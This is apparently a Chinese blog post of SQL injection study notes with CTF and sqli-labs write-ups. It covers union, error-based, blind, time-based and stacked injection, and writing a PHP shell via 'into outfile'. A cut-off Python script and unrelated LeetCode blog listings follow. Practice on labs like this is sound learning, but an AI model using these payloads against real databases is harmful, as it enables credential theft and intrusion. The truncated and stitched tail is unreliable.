ameuu

SQL注入学习记录一

前置知识：

1.mysql数据库的一些基本使用：增删改查

2.python脚本的使用

3.了解php中常见的与mysql相关的函数和类

0x01:数据库基础

1.基础操作

查看库名：
mysql> show databases;
创建库：
mysql> creat database test;
删除库：
mysql> drop database test;
使用库：
mysql> user test
创建表：
mysql> create table test(
-> `id` int(11),
-> `name` varchar(255)
->);

表的一些基本操作：

1.insert(增
	insert into test values('1','yer');
2.delete(删
	delete from test where xxxx;
3.update(改
	update test set name='x' where id = 1;
4.select(查
	select * from test;
	# * 实现输出所有字段

2.常用的变量、符号、函数

常用变量：
database() //查看当前数据名
user() //用户
version() //mysql版本
@@basedir //安装路径

逻辑运算符
1.& and
2.|| or
3.^ xor

常用函数
1.字符串截取：
substr(database(),1,1) //从1位置开始截取长度为1  substring
mid(database(),1,1)
left(database(),1) //左边开始截取长度为1
right(database(),1)
2.编码函数
ascii()
hex()
char()
3.文件函数
load_file //读取文件内容

0x02:闭合

1.闭合

如果语句中有多余的和单引号或者其他符号就会报错，所有要进行闭合

常见注释符：

%23（#）
--+
;%00  //利用00截断
`
or '1'='1

ban了注释符和单引号

使用反斜杠进行转义

0x03:常见注入方法

1.联合查询注入

基本要求：
1.查询列数必须一致
2.查询语句的查询的各列类型、顺序最好一致

步骤：
1.闭合
2.判断字段数
3.判断结果输出位置
4.爆库、爆表、爆列
#order by：如果后面接的是整形的话，根据第几个字段进行排序
#union：合并结果
#information_schema数据库中，table表提供关于数据库中表的信息，columns表提供表中列信息

利用sqlilabs进行试验

查询字段数：
order by 4
查询结果输出位置：
union select 1,2,3
爆库：
union select 1,2,database()
爆表：
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
爆列：
union select 1,2,group_concat(column_name) from information_schema.columns where table_name=''

2.报错注入

在没法用联合查询时使用，报错注入就是利用了数据库的某些机制，人为的制造错误条件，使得查询结果能够出现在错误信息中

原理：

路径写入其他格式，就会报错并且会返回我们写入非法格式内容，我们可以利用这个得到我们想得到的内容

tips：
报错注入有长度限制，不同的函数限制不一样

常用函数：

1.updatexml:更新xml文档的函数
2.extractvalue：对xml文档进行查询的函数

//updatexml的最大长度是32位的，所以有所局限，如果密码长度超过了32位就不会被显示出来，可以用right函数

常用语句：

updatexml(1,concat(0x7e,database(),0x7e),1)
//之后修改中间concat的语句即可

3.盲注

根据sqlilabs进行学习

只有两种回显（永真永假）的时候，为布尔盲注

步骤：
1.闭合
2.找到永真和永假的两种情况
3.利用这两种情况进行对数据进行一位一位的获取

涉及函数：
substr
ascii

语句：

and ascii(substr(database(),1,1))>1

通过时间差导致的两种不同的回显的注入，为时间盲注

时间盲注中可以使用if表达式和sleep函数
//if(expr1,1,sleep(5))
//如果expr1为true则搜索1，反之则触发sleep实现延时差

1.sleep
2.benchmarkdui
3.笛卡尔积

爆破还可以利用python脚本

4.堆叠注入

mysql

1' ;show tables# (查看表)
1' ;create table test like users#(创建新表)
1' ;drop table test#(删除新创建的表)
1' ;select 1,2,3#(查询数据)
1' ;select load_file('c:/tmpupbbn.php')#(加载文件)
1' ;insert into users(id,username,password)
values('100','new','new')#(修改数据)
1' ;rename tables

利用 HANDLER 读取数据

1';handler ` ` open;handler ` ` read first;handler ` ` close;#

0x04:文件读写

可以将数据库中的数据写入文件中

条件：

1.设置security-file-priv为Null
2.设置路径
3.文件不存在
4.有权限

文件读取函数：

load_file('文件绝对路径')

写文件函数：

into outfile
into dumpfile
//区别在于，因为into outfile函数会在行末端写入新行更致命的是会转义换行符，所有如果是利用mydql写一些dll或者其他二进制可执行文件，那么这个文件可能会被破坏，这时候我们用into dumpfile就能导出一个完整能执行的二进制文件

写文件–>写shell

读文件—DNSLOG外带

DNSLOG

前置知识：

1.UNC路径：

（只存在于windows中

unc路径就是类似\\softer这样的形式的网络路径
格式：\\servername\sharename 其中servername是服务器名，sharename是共享资源的名称

条件:

1.设置security-file-priv为null
2.目标为windows

学习资料：

https://www.anquanke.con/post/id/205376

[BJDCTF 2nd]简单注入

布尔盲注

0x01:打开场景

访问robots.txt发现有hint.txt

所有可以知道注入点是password，并且要闭合单引号
而在简单尝试之后发现单引号和很多关键词（如 select）被ban掉了
所有可以判断是盲注
但单引号被ban了的话，那有可能就是整数型注入

0x02:解题
可以让：
username=admin\&password=or 1#
以为sql语句为：
select * ffrom users where username=' ' and password= ' ';
这样的话\反引号会将后面的单引号进行转义，使得语句变成username=' and password=' '就会出现注入点

username=admin\&password=or 1#

出现了新的回显

即布尔盲注

1.脚本爆破
还不会写脚本只能用师傅们的脚本了

import requests
import time
session = requests.Session()
def main():
    name=''
    for i in range(20):
        left=32
        right=128
        tmp=(right+left)//2
        while left

 
  用admin登录得到flag 
  2.bp手注
 核心注入语句： 
  ascii(substr(password,1,1))>32#
 
  经过测试之后得到永真和永假回显
 永真：
 
 永假：
 
 之后就是一位一位地进行测试得到password 
  username=admin\&password=or ascii(substr((password),1,1))>80 #    //假
username=admin\&password=or ascii(substr((password),1,1))<80 #    //真
username=admin\&password=or ascii(substr((password),1,1))>55 #    //真
username=admin\&password=or ascii(substr((password),1,1))>67 #    //真
username=admin\&password=or ascii(substr((password),1,1))>73 #    //真
username=admin\&password=or ascii(substr((password),1,1))>79 #    //假
username=admin\&password=or ascii(substr((password),1,1))<79 #    //真
 
  所有首位ascii码值为79是O，其他的类似，太长了，就不一一写出来了 
  参考 
  https://blog.csdn.net/stevenonesir/article/details/111697089
https://blog.csdn.net/qq_41628669/article/details/106133127
 
  [SWPU2019]Web1 
  MariaDB 
  二次注入 
  无列名注入 
  0x01:打开场景
 是一个登陆界面，但并没有什么阻碍，直接注册并登录就行了，登录进去之后有广告申请
 
 由于内容有字数限制，所有注入点应该在广告名上 
  0x02:解题
 空格被过滤了可以用/**/代替
 1）先爆破列数
 or也被过滤了，所以不能用order by，可以用group by 
  1' /**/ group /**/ by /**/ 1,'1
 
  发现有22列
 
 2）查找数据显示位置 
  -1' /**/ union /**/ select /**/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  
 3）爆破数据
 已知or被过滤了，因此information_schema也不能使用，而在查询版本的时候发现这个是用的是MariaDB
 mysql.innodb_table_stats
 可以知道MariaDB中mysql.innodb_table_stats可以代替information_schema 
  爆表
-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  
 之后用到了无列名注入
 SQLi Extracting data without knowing columns names 
  payload： 
  -1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  参考： 
  https://www.anquanke.com/post/id/193512
https://blog.csdn.net/weixin_43900387/article/details/103534108
https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/
https://www.jianshu.com/p/dc9af4ca2d06
 
  SQLILABS 
   
   把复现的题目和以前写的wp一起放上来了 
   
  Less-1 
  输入1 和 2-1 之后发现两个回显不相同 所以是字符型注入 
  尝试添加’注入，发现报错 
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
 
  这里我们就可以直接发现报错的地方，直接将后面注释，然后使用 
  1' order by 3%23 //得到列数为3

//这里用-1是为了查询一个不存在的id,好让第一句结果为空，直接显示第二句的结果
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //得到数据库名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'# //得到表名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'# //得到列名

-1' union select 1,username,password from users where id=3# //爆破得到数据
 
  Less-2 
  在添加’之后，得到返回 
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
 
  可以得到这个sql语句其实并没有单引号，只是用数字进行查询，例如 
  select * from users where id=1
 
  所以我们也可以跟上面一样，payloads: 
  -1 or 1=1%23
 
  Less-3 
  添加’之后，返回 
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
 
  可以得到大概的sql语句: 
  select * from users where id=('input') LIMIT 0,1;
 
  所以我们可以需要闭合)。 
  -1') or 1=1%23
 
  Less-4 
  尝试’并未发现报错，尝试”发现报错 
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
 
  可以得到大概的sql语句 
  select * from users where id = ("input") LIMIT 0,1;
 
  所以payload: 
  -1") or 1=1 %23
 
  其他注入语句同上 ，就不再一一列举了。 
  Less-5 
  尝试’发现报错 
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
 
  猜测sql语句为 
  select * from users where id='input' LIMIT 0,1;
 
  如果尝试之前的注入方法，会发现不再会返回我们注入的信息，如果注入成功的话，页面会返回You are in...，出错的话就不会返回这个字符串，所以这里我们可以进行盲注。 
  使用left() 
  例如我们可以使用1' and left(version(),1)=3%23这个payload进行测试，截取version()得到的最左侧的字符判断是否为3，如果为3则正常返回You are in...，否则不返回。所以我们可以利用这个一步一步爆破得到left(version(),1)=5。爆破区间可以确定在/[0-9.]/。 
  采用1'and length(database())=8%23对数据库名字长度进行爆破，确定数据库名字长度之后，我们可以使用database()来进行爆破数据库名，采用left(database(),1)>'a'这个payload进行测试，原理跟上述一致，看返回即可，直到截取长度与数据库名字一致为止，这里效率比较高的就是采用二分法进行盲注。 
  使用substr()、ascii() 
  也可以采用substr()、ascii()函数进行尝试: 
  1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23 
//截取数据库下第一个表的第一个字符与80ascii值进行对比

找第二个字符只需要改成substr('xxx',2,1)即可。
找第二个表改成limit 1,1
 
  使用regexp() 
  1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1;)%23
//users表中的列名是否有us**的列
 
  使用ord()、mid() 
  1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23
//cast(username AS CHAR)将username转换成字符串
//IFNULL(exp1,exp2)假如expr1不为NULL，则IFNULL()的返回值为expr1; 否则其返回值为expr2。IFNULL()的返回值是数字或是字符串，具体情况取决于其所使用的语境。
//ord前文提过
 
  使用报错注入 
  推荐一篇超详细的讲解报错注入的文章 
  Mysql报错注入原理分析(count()、rand()、group by) 
  超链接：https://www.cnblogs.com/xdans/p/5412468.html 
  1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0
x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

1' union select 1,count(*) ,concat((select user()),floor(rand(0)*2))x from security.users group by x#

1' union select (!(select * from (select user())x) - ~0),2,3 --+

1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+

1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+

1' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+
 
  使用延时注入 
  benchmark 是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark() 中带有两个参数，第一个是执行的次数，第二个是要执行的函数或者是表达式 
  1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
 
  数据爆破 
  ?id=1' and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
 
  Less-6 
  没有回显，可以使用布尔盲注 
  1" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--+
 
  可以发现>100有回显，小于就没有，也可以用报错注入… 
  这里就是把Less-5 中的'改成"就行了 
  报错注入： 
  0x01:报错数据库 
  1" and (select 1 from(select count(*),concat(floor(rand(0)*2),(select(select schema_name) from information_schema.schemata limit 0,1),0x7e)x from information_schema.tables group by x)a)%23
 
  0x02:报错表 
  1" and (select 1 from(select count(*),concat(floor(rand(0)*2),(select(select table_name) from information_schema.tables where table_schema='ctftraining' limit 0,1),0x7e)x from information_schema.tables group by x)a)%23
 
  0x03:报错列 
  1" and (select 1 from(select count(*),concat(floor(rand(0)*2),(select (select column_name) from information_schema.columns where table_schema='ctftraining' and table_name='users' limit 0,1),0x7e)x from information_schema.tables group by x)a)%23
 
  0x04:报数据 
  1" and (select 1 from (select count(*),concat(floor(rand(0)*2),(select (select(select concat('username',0x7e,'password',0x7e) from ctftraining.users limit 0,1)) from information_schema.tables limit 0,1),0x7e)x from information_schema.tables group by x)a)%23
 
  Less-7 
  使用文件导出 
  1'))UNION SELECT 1,2,3 into outfile "c:\\wamp\\www\\sqlli b\\Less-7\\uuu.txt"%23

1'))UNION SELECT 1,2,'' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+
 
  关于mysql修改文件权限 
  查看： 
  show variables like '%secure%';
 
  修改mysql文件夹里面的my.ini 在第二个default下面添加： 
  secure_file_priv="/"
 
  之后重启mysql 
  Less-8 
  可以使用时间盲注，也可以用 bool 盲注 
  1' and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+
 
  Less-9 
  同 Less-8 可以使用时间盲注 
  1' and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+
 
  Less-10 
  1" and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+
 
  Less-11 
  基于错误的post型单引号字符型注入 
  登录界面注入，万能注入语句： 
  1'or 1=1#

-1' order by 2#

-1' union select 1,database()#

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

-1' union select username,password from users where id=2#
 
  //爆数据
1' union select null,group_concat(concat_ws(0x7e,username,password)) from security.users#
 
  Less-12 
  1") or 1=1#
 
  Less-13 
  盲注 
  *和第五题类似 
  select length(database())
if(length(database())=8,sleep(6),1)
 
  
 
 两个回显
 db: 
  security/ctftraining 
  tables: 
  emails/referer/uagents/users 
  users-columns: 
  user/current_con/total/id/username/password 
  猜解库：
1') or if(length(database())=8,1,sleep(5))#
1') or left(database(),1)>='m'#
 
  猜解表：
1') or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>='a'#
 
  猜解列：
1') or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)>='a'#

1') or ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),8,1))>120#

1') or substr((select column_name from information_schema.columns where table_name='users' limit 1,1),8,1)>'a'#
 
  1') union select count(*),concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#
 
  报错注入： 
  1') union select count(*),concat(0x7e,(select database() ),0x7e ,floor(rand(0) *2 ) ) as a from information_schema.tables group by a#
 
  1') union select count(*), concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a#
//通过改变'limit 1,1)' 查找各种表
 
  1') union select count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a#
 
  1') union select count(*),concat(0x7e,(select concat_ws('0x7e',password,0x7e,username) from users limit 1,1),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a#
 
  Less-14 
  盲注
 和13一样 
  1" or 1=1#
 
  Less-15 
  1' or 1=1#
1' or ascii(substr(database(),1,1))=115#
 
  Less-16 
  1") or 1=1#
1") or ascii(substr(database(),1,1))=115#
 
  Less-17 
  username被过滤 password处注入 
  1' or 1=1#
 
  //猜解库
1'and extractvalue(1,concat(0x7e,(select database()),0x7e))#&submit=Submit
 
  //猜解表（但只有一个
1' and extractvalue(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),0x7e))#&sub mit=Submit 
 
  updatexml函数。 
  （·）。updatexml()函数是MySQL对xml文档数据进行查询和修改的xpath函数
 （·）。updatexml(xml_target,xpath_expr,new_xml)
 （·）。xml_target ：原来的xml，也就是要替换的目标；
 （·）。xpath_expr ：xpath的表达式；
 （·）。new_xml ：替换后的xml；
 （·）。这一段的意思就是，用new_xml把xml_target中包含xpath_expr的部分节点（包括xml_target）替换掉。 
  ' or updatexml(1,concat('#',(Clause。。)),1)#
 
  //猜解库
1' or updatexml(1,concat('#',(select database())),1)#
//猜解表
' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#&sub mit=Submit
//猜解字段
' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1)#
//爆数据
' or updatexml(1,concat('~',(select * from (select concat_ws(' ',id,username,password) from users limit 0,1) a)),1)#
 
  Less-18 
  在useragent注入 
  //三个1是插入三个数据
1' ,1,1)#
//有返回：
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')#', '172.16.170.85', 'admin')' at line 1
//猜解库
1',1,updatexml(1,concat(0x3a,database(),0x3a),1))#
//猜解表
1',1,updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x3a),1))#
//猜解字段
1',1,updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,1),0x3a),1))#
//爆数据
1' ,1,updatexml(1,concat(0x3a,(select concat_ws(' ',id,username,password) from users limit 0,1),0x3a),1))#
 
  Less-19 
  在referer注入 
  1' 
  You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '172.16.170.85')' at line 1
 
  //猜解库
1' and updatexml(1,concat(0x3a,database(),0x3a),1))#
//猜解表
1',updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x3a),1))#
//接下来和18一样

JavaScript两个数组的交集 II 流落的小鬼
刷题记录：JavaScript两个数组的交集II给你两个整数数组nums1和nums2，请你以数组形式返回两数组的交集。输入：nums1=[1,2,2,1],nums2=[2,2]输出：[2,2]varintersect=function(nums1,nums2){varresult=[];vari=0,j=0;nums1.sort((a,b)=>a-b);nums2.sort((a,b)=>a-
力扣刷题记录（一）剑指Offer（第二版）乘凉~ 求职过程记录 leetcode 链表算法
1、本栏用来记录社招找工作过程中的内容，包括基础知识学习以及面试问题的记录等，以便于后续个人回顾学习；暂时只有2023年3月份，第一次社招找工作的过程；2、个人经历：研究生期间课题是SLAM在无人机上的应用，有接触SLAM、Linux、ROS、C/C++、DJIOSDK等；3、参加工作后（2021-2023年）岗位是嵌入式软件开发，主要是服务器开发，Linux、C/C++、网络编程、docker容
Leetcode刷题记录分享——数据结构（队列） #200 岛屿数量三年买房不是梦 Leetcode数据结构 leetcode 数据结构队列 bfs
Leetcode刷题记录分享——数据结构（队列）PS：刷题两周了，每周天会专门抽出一段时间来刷Leetcode，这学期在学算法设计与分析，根据课程内容，第一周刷动态规划题目，第二周刷的贪心算法。打算从这周开始刷数据结构。数据结构是大二上学期学的了，过去了一年，当时学的也不扎实，现在通过Leetcode理论+实践重新学习一下。我刷Leetcode会先看一下优质解答，肚里没货硬刚也刚不出来，主要是学习
Leetcode刷题日记：1-5题篇 companion_zhang 力扣刷题记录 leetcode 算法数据结构 c++
Leetcode刷题日记：1-5题篇简介题目：一.两数之和二、两数相加三、无重复字符的最长子串四、寻找两个正序数组的中位数五、最长回文子串注简介这个系列将是Leetcode的刷题记录贴，按照题库顺序，每五题为一贴，主要目的做自己的记录、总结之用，但若有同学或同好看到此贴，并有所帮助，也算额外之喜，共勉！题目：一.两数之和给定一个整数数组nums和一个整数目标值target，请你在该数组中找出和为目
Leetcode Hot 100刷题记录 -Day9（最大子数和）刘心奶黄包～ leetcode 算法数据结构 java
最大子数和问题描述：给你一个整数数组nums，请你找出一个具有最大和的连续子数组（子数组最少包含一个元素），返回其最大和。子数组是数组中的一个连续部分。示例1：输入：nums=[-2,1,-3,4,-1,2,1,-5,4]输出：6解释：连续子数组 [4,-1,2,1]的和最大，为 6。示例2：输入：nums=[1]输出：1示例3：输入：nums=[5,4,-1,7,8]输出：23//提交版clas
代码随想录+力扣刷题记录+华为机考准备记录梁慢慢慢慢 leetcode 算法数据结构
为了准备华为机考的刷题记录，已压线过背景：数据结构与算法零基础，此前没有刷过题，会Python。学习路线按照代码随想录的顺序刷题，刷题平台：力扣以上大致过了一遍后开始刷华为机考真题（cdsn上购买的真题，刷题平台是购买的真题中的OJ平台，也是ACM模式）总共用时1个月。完成情况：力扣80个题+华为2024年机考真题。大部分题目都只做过1次，掌握得很不牢固，机考的时候也是压线过。时间比较紧急，做到后
【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列（CRYPTO篇） SebastianH_ 安全
新手小白，开启CTF刷题之路（持续更新）此处主要在NSSCTF平台（NSSCTF|在线CTF平台）上开展刷题[SWPUCTF2021新生赛]pigpig附件如下：刚好前段时间刷到到过一篇文章讲猪圈密码的，直接对着看就行[CTF]猪圈密码_ctf猪圈密码_神龙云计算的博客-CSDN博客flag是WHENTHEPIGWANTTOEAT[SWPUCTF2021
leetcode刷题记录-两数相加每天都一万遍想吃 leetcode
leetcode小白每日做题记录习题集：hot100（c++）题目：第二题两数相加（难度中等）做题思路小白目前只能想到比较直接的方法：本题是采用不带头结点的单链表进行操作的（这里要注意！不然后续的进位计算会出错！！这是我最开始踩的坑）通过对链表中数据的观察，发现只需要维护一个进位变量，这里我采用的是bool型变量，当需要进位时置进位变量st为true，反之为false。由于链l1,l2链表的长度不
Leetcode刷题记录 - 链表问题石语予木 leetcode刷题 leetcode java 单链表
链表问题总结常出现的几种链表问题文章目录链表问题前言问题一：倒数第k个元素问题二：中间位置的结点`问题三：环形链表问题4：未完待续问题5：未完待续前言无法高效获取长度，无法根据偏移快速访问元素，是链表的两个劣势。然而面试的时候经常碰见诸如获取倒数第k个元素，获取中间位置的元素，判断链表是否存在环，判断环的长度等和长度与位置有关的问题。这些问题都可以通过灵活运用双指针来解决。参考链接：https:/
【LeetCode】刷题记录--单链表相关 DelTTAA leetcode 算法职场和发展
21publicListNodemergeTwoLists(ListNodelist1,ListNodelist2){if(list1==null)returnlist2;if(list2==null)returnlist1;ListNoderesult=newListNode(0);ListNodep=result;while(list1!=null&&list2!=null){if(list1
leetcode hot 100刷题记录 WJX574 leetcode 算法数据结构
1.两数之和暴力：(还是垃圾暴力版本）classSolution{public:vectortwoSum(vector&nums,inttarget){vectorans;for(inti=0;itwoSum(vector&nums,inttarget){intn=nums.size();for(inti=0;i键值对分别为数组值和数组下标，注意，遍历每一个数组元素，在哈希表里找，没找到的话就将这
刷题记录-HOT 100（一）40道 Colddd_d 刷题 python 开发语言
记录题解和思路。一、哈希表解决问题1、两数之和思路：创建哈希表：初始化了一个空字典来存储已经访问过的数字及其对应的索引。遍历数组：逐一遍历数组中的每个元素。在遍历过程中，针对每个元素num，计算出它需要的配对数，即target-num。查找配对：检查哈希表中是否存在这个配对数。如果存在，说明找到了目标数对，此时返回这两个数的索引（即哈希表中存储的索引和当前数的索引）。更新哈希表：如果没有找到对应的
【hot100篇-python刷题记录】【回文链表】我明天再来学Web渗透力扣hot100-python 链表数据结构 python 开发语言 leetcode 算法职场和发展
R7-链表篇思路：转回文数组法链表转数组，再使用双指针判断是不是回文数组即可。wkao?!根本不用双指针判断是否回文数组，只需要倒序判断布尔值即可。（牛啊牛啊）#Definitionforsingly-linkedlist.#classListNode:#def__init__(self,val=0,next=None):#self.val=val#self.next=nextclassSolut
【hot100篇-python刷题记录】【搜索插入位置】我明天再来学Web渗透 python 开发语言算法 leetcode
R5-二分查找篇二分查找不用教了吧classSolution:defsearchInsert(self,nums:List[int],target:int)->int:left,right=0,len(nums)-1#使得[left,right]区间不为空whileleft<=right:mid=(left+right)//2ifnums[mid]
2024.3.25力扣（1200-1400）刷题记录 Circusxxx 2024年3月力扣刷题记录 leetcode 算法 python
一、1784.检查二进制字符串字段1.使用0分割。分割出来的结果是含有“1”的串和空串。classSolution:defcheckOnesSegment(self,s:str)->bool:#使用0分割returnsum(len(c)!=0forcins.split("0"))bool:#除了前面可以出现0，后面不能出现#1最后出现的位置必须在0第一次出现位置的前面idx_one=0idx_ze
【刷题记录】合并两个有序数组、移除元素睡觉待开机算法数据结构
本系列博客为个人刷题思路分享，有需要借鉴即可。1.题目链接：T1：LINKT2：LINK2.详解思路：T1:思路1：弄个新数组，比较两个数组中的值，哪个小就把哪个值放到新数组中。分析1：时间复杂度：O（N）；空间复杂度：O（N）但是显然在本题中题目明确表示要放在原数组中，否定该思路。思路2：把nums2内容拷贝到nums1有效数据的后面，再进行排序分析2：否定，仅排序而言时间复杂度：O（N*log
【Web】CTFSHOW java刷题记录(全) Z3r4y java ctfshow struts2 struts rce cve web
目录web279web280web281web282web283web284web285web286web287web288web289web290web291web292web293web294web295web296web297web298web299web300web279题目提示url里告诉我们是S2-001直接进行一个exp的搜S2-001漏洞分析-CSDN博客payload:%{#a=
【刷题记录】移除链表元素睡觉待开机链表数据结构
本系列博客为个人刷题思路分享，有需要借鉴即可。注：部分思路借鉴自程序员小熊链接：https://leetcode.cn/problems/remove-linked-list-elements/solutions/341875/203-yi-chu-lian-biao-yuan-su-you-ya-di-gui-c-yu-ya/来源：力扣（LeetCode）1.目录大纲：2.题目链接：T1：LIN
leetcode刷题记录（三数之和）超时记录顺利毕业（研） leetcode 算法 python
1.题目描述2.解题思路看到这个题目，感觉和之前做的水仙花数的题目差不多，对于一个没有经过训练来说，首先想到的事情就是暴力破解，直接上循环就可以了，但是这样肯定在时间上占不到优势，解决问题肯定能够解决，但是leetcode上通不过。附上我自己写的代码。classSolution:defthreeSum(self,nums:List[int])->List[List[int]]:reesult=[]
LeetCode刷题记录：110. 平衡二叉树「已注销」 c++
110.平衡二叉树解题思路：使用递归遍历二叉树，求出每个二叉树节点的高度并进行判断。递归时若二叉树节点没有子节点，返回0；若二叉树左右节点的高度差的绝对值大于1，说明树已经不满足平衡树的条件，返回-1；否则返回当前节点的最高高度（即左右节点高度中的最大值+1）。通关代码：classSolution{public:intheight(TreeNode*root){if(root==NULL){ret
leetcode刷题记录：暴力搜索算法01 - 回溯小新0077 2024算法工程师求职 leetcode 算法职场和发展
参考：labuladong的算法小抄https://labuladong.online/algo/essential-technique/backtrack-framework/这篇太牛了，一个模板把所有的排列组合子集问题全秒了。1.简介暴力搜索算法：回溯、dfs、bfs。这些都可以看做是从二叉树算法衍生出来的。解决一个回溯问题，实际上是在遍历一颗决策树的过程。树的每个叶子结点上存着一个答案。把整
LeetCode刷题记录（二叉树篇）蓝鲸小镇不临海二叉树算法 leetcode
文章目录前言一、简单题226.翻转二叉树前言保研在即，记录一下我的刷题过程提示：以下是本篇文章正文内容，下面案例可供参考一、简单题226.翻转二叉树基本思路：一个简单的递归前序遍历搞定。代码：publicTreeNodeinvertTree(TreeNoderoot){if(root==null)returnnull;TreeNodetmp=root.right;root.right=root.l
leetcode刷题记录：二叉树04（序列化和反序列化）小新0077 2024算法工程师求职 leetcode linux 算法
参考：https://labuladong.online/algo/data-structure/serialize-and-deserialize-binary-tree/1.前中后序和二叉树的唯一性给定空指针的前提下，只有前序和后序可以唯一确定一颗二叉树；中序不可以。原因是中序遍历无法确定二叉树根节点的位置。不给定空指针的前提下，只靠一种遍历结果是无法还原二叉树的；给定前序和中序，或者中序和后
有不含有重复数字的数组构造二叉树_Leetcode刷题记录：构建最大数二叉树 southbread
题目要求，题目地址给定一个不含重复数字的数组，最大二叉树构建规则如下：1、根是数组中最大的数字2、左边的子树是最大数字左边的内容3、右边的子树是最大数字右边的内容答案classSolution(object):defconstructMaximumBinaryTree(self,nums):""":typenums:List[int]:rtype:TreeNode"""#print(max(num
leetcode刷题记录 1.1 链表小新0077 2024算法工程师求职 leetcode 链表 linux
参考:labuladong的算法小抄，自己按照思路手写了一遍https://labuladong.github.io/algo/di-ling-zh-bfe1b/shuang-zhi-0f7cc/链表Checklist如果要创造一个新表，用dummy指针避免空指针的处理情况，代码更简洁分割链表：记得断开原链表的next，否则结果有环快慢指针应用倒数第k个：fast先跑k步，slow开始跑环形链表：
leetcode刷题记录：二叉树1（纲领篇）小新0077 2024算法工程师求职 leetcode 算法职场和发展
摘自labuladong的算法小抄：https://labuladong.online/algo/essential-technique/binary-tree-summary-2/1.二叉树的遍历框架voidtraverse(TreeNode*root){if(!root){return;}//前序位置traverse(root->left);//中序位置traverse(root->right
leetcode刷题记录：二叉树03（构造二叉树）小新0077 2024算法工程师求职 leetcode 算法职场和发展
参考：https://labuladong.online/algo/data-structure/binary-tree-part2/构造问题一般都是通过分解的思路，构造整棵树=根节点+构造左子树+构造右子树654最大二叉树找到最大值和对应的index先把根节点构造出来，然后递归地构造左子树和右子树需要一个traverse函数，传入nums的索引，返回以nums[lo:hi]构造的最大二叉树。cl
leetcode刷题记录：二叉树02（思路篇）小新0077 2024算法工程师求职 leetcode 数据结构算法
参考labuladong的算法小抄：https://labuladong.online/algo/data-structure/binary-tree-part1/复习二叉树纲领篇，二叉树解题的思维模式分两类：1、是否可以通过遍历一遍二叉树得到答案？如果可以，用一个traverse函数配合外部变量来实现，这叫「遍历」的思维模式。2、是否可以定义一个递归函数，通过子问题（子树）的答案推导出原问题的答
Leetcode面试经典150题刷题记录 —— 数学篇键盘国治理专家面试技术栈 Algorithm 算法面试
